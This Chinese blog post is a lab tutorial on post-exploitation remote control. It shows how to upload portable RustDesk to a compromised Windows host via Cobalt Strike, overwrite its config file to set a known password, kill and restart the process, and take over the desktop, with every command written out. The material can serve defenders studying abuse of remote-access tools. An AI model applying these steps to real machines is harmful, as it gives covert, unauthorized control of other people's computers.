[横向移动] 远控优化 — 通过 “RustDESK” 获取远程桌面

SRC_BLUE_172025-03-20 19:35

🌟想系统化学习内网渗透?****看看这个:[内网安全] 内网渗透 - 学习手册-CSDN博客

https://github.com/rustdesk/rustdeskhttps://github.com/rustdesk/rustdesk

0x01:RustDESK --- 工具介绍

RustDesk 是一款开箱即用的远程桌面软件,无需任何配置,完美替代 TeamViewer。用户可以完全掌控数据,不用担心安全问题。该项目是完全开源的,用户可以搭建自己的注册/中继服务器,当然,也可以直接使用官方提供的服务器。

0x02:RustDESK --- 获取远程桌面原理

RustDesk 获取远程桌面的原理与我们之前讲解的 ToDesk 类似,都是通过修改目标本地的配置文件以使未知的验证码变得已知,进而对目标发起远控。

0x03:RustDESK --- 获取远程桌面操作

环境配置

  • 攻击机(Kali Linux):172.16.0.103 --- 安装了 Cobalt Strike 服务端与客户端

  • 靶机(WIndows 7):172.16.0.122

0x0301:上传并运行 RustDESK

假设内网渗透中,你已经拿下了一个目标靶机,此时想远程桌面它,那么你就可以考虑使用这个工具。首先通过 Cobalt Strike 将工具上传到靶机中:

然后使用下面的命令直接运行 RustDesk 即可,它是一款便携程序,是不用安装的:

bash 复制代码 
shell C:\Users\Administrator\Desktop\rustdesk-1.1.9.exe

0x0302:定位 RustDESK 配置文件

RustDesk 运行后,会在本地生成一个配置文件,里面包括了机器的识别码和验证码。我们可以通过下面这条命令,来查看 RustDESK 的配置文件:

bash 复制代码 
shell type C:\Users\用户名\AppData\Roaming\RustDesk\config\RustDesk.toml

可以看到,刚刚安装的 RustDESK 的配置文件里是没有 password 的,我们得给它加上。

0x0303:偷天换日之篡改 RustDESK 配置文件

我们将靶机的 RustDESK 配置文件的内容复制下来,并给它手动加上一个 Password:

bash 复制代码 
id = '113769990'
password = 'qrrtyi'
salt = '6k2mt4'
key_pair = [
    [
    83,
    183,
    170,
    77,
    217,
    78,
    138,
    247,
    86,
    60,
    117,
    114,
    91,
    110,
    237,
    121,
    16,
    127,
    189,
    86,
    186,
    80,
    121,
    150,
    173,
    189,
    130,
    250,
    84,
    208,
    200,
    104,
    251,
    61,
    17,
    68,
    77,
    101,
    240,
    192,
    177,
    34,
    253,
    150,
    194,
    220,
    21,
    2,
    136,
    245,
    77,
    89,
    96,
    128,
    214,
    48,
    194,
    176,
    228,
    217,
    110,
    112,
    174,
    244,
],
    [
    251,
    61,
    17,
    68,
    77,
    101,
    240,
    192,
    177,
    34,
    253,
    150,
    194,
    220,
    21,
    2,
    136,
    245,
    77,
    89,
    96,
    128,
    214,
    48,
    194,
    176,
    228,
    217,
    110,
    112,
    174,
    244,
],
]
key_confirmed = true
​
[keys_confirmed]
rs-ny = true

然后我们通过 Cobalt Strike 删除目标机器上原有的配置文件,并在本地创建一个 RustDesk.toml 文件,里面的内容就是我们上面修改的,并将该文件上传到靶机中:

0x0304:重启靶机 RustDESK

篡改完目标的配置文件后,我们还需要让目标的 RustDESK 重启以加载配置文件。首先通过下面的命令,找到目标正在运行的 RustDESK 进程的 PID 号:

bash 复制代码 
tasklist | findstr "rust"

然后通过下面的命令强制关闭该进程:

bash 复制代码 
taskkill /pid 2884 /F

最后,我们再通过一开始的命令重启靶机的 RustDesk 让其加载我们篡改过的配置文件:

bash 复制代码 
shell C:\Users\Administrator\Desktop\rustdesk-1.1.9.exe

0x0305:查看靶机 RustDESK 密码并进行远控

靶机的 RustDESK 已经开始运行了,此时我们再尝试读一下它的配置文件:

bash 复制代码 
shell type C:\Users\用户名\AppData\Roaming\RustDesk\config\RustDesk.toml

如上,成功拿到远控的账号和密码,此时我们就可以在攻击端也启动一个 RustDesk 然后输入上面获取到的信息对目标进行远控啦。

笔者实验采用的 RustDESK 版本是 1.1.9 的,已经属于老版本了,它建立的远控很不稳定,如果实战中想要使用,建议去参考官方的自建中继器。对于新版的 RustDESK 笔者也看了,它的 ID 做了加密,笔者没破解出来,不过其实也无所谓,我们还可以尝试直接去替换目标的配置文件来达到修改工具 ID 与密码的目的(密码可以修改,因为它似乎是本地验证,但是 ID 不确定改了会不会有问题,因为笔者怀疑它的 ID 与机器码绑定了)。

相关推荐
小白爱电脑1 小时前
什么是2.5G交换机?
运维·网络·5g·千兆宽带
游戏开发爱好者81 小时前
iOS 出海 App 安全加固指南:无源码环境下的 IPA 加固与防破解方法
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_915921432 小时前
苹果App上架流程:不用Mac也可以上架的方法
websocket·网络协议·tcp/ip·http·网络安全·https·udp
阿沁QWQ2 小时前
UDP的socket编程
网络·网络协议·udp
HXR_plume3 小时前
【计算机网络】王道考研笔记整理(1)计算机网络体系结构
网络·笔记·计算机网络
R_.L4 小时前
网络 :数据链路层
网络
网硕互联的小客服5 小时前
服务器经常出现蓝屏是什么原因导致的?如何排查和修复?
运维·服务器·stm32·单片机·网络安全
cat_with_cat6 小时前
Linux网络:UDP socket创建流程与简单通信
linux·网络·udp
不绝1916 小时前
怪物机制分析(有限状态机、编辑器可视化、巡逻机制)
网络·游戏·unity·游戏引擎
.YYY7 小时前
网络--初级
网络·计算机网络
热门推荐
01集群聊天服务器---MySQL数据库的建立02Java学习第十五部分——MyBatis03Coze扣子平台完整体验和实践(附国内和国际版对比)04《深入设计模式》模式结构汇总05使用Ruby接入实时行情API教程06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07基于odoo17的设计模式详解---单例模式08基于odoo17的设计模式详解---装饰模式09DeepSeek各版本说明与优缺点分析10Java类变量(静态变量)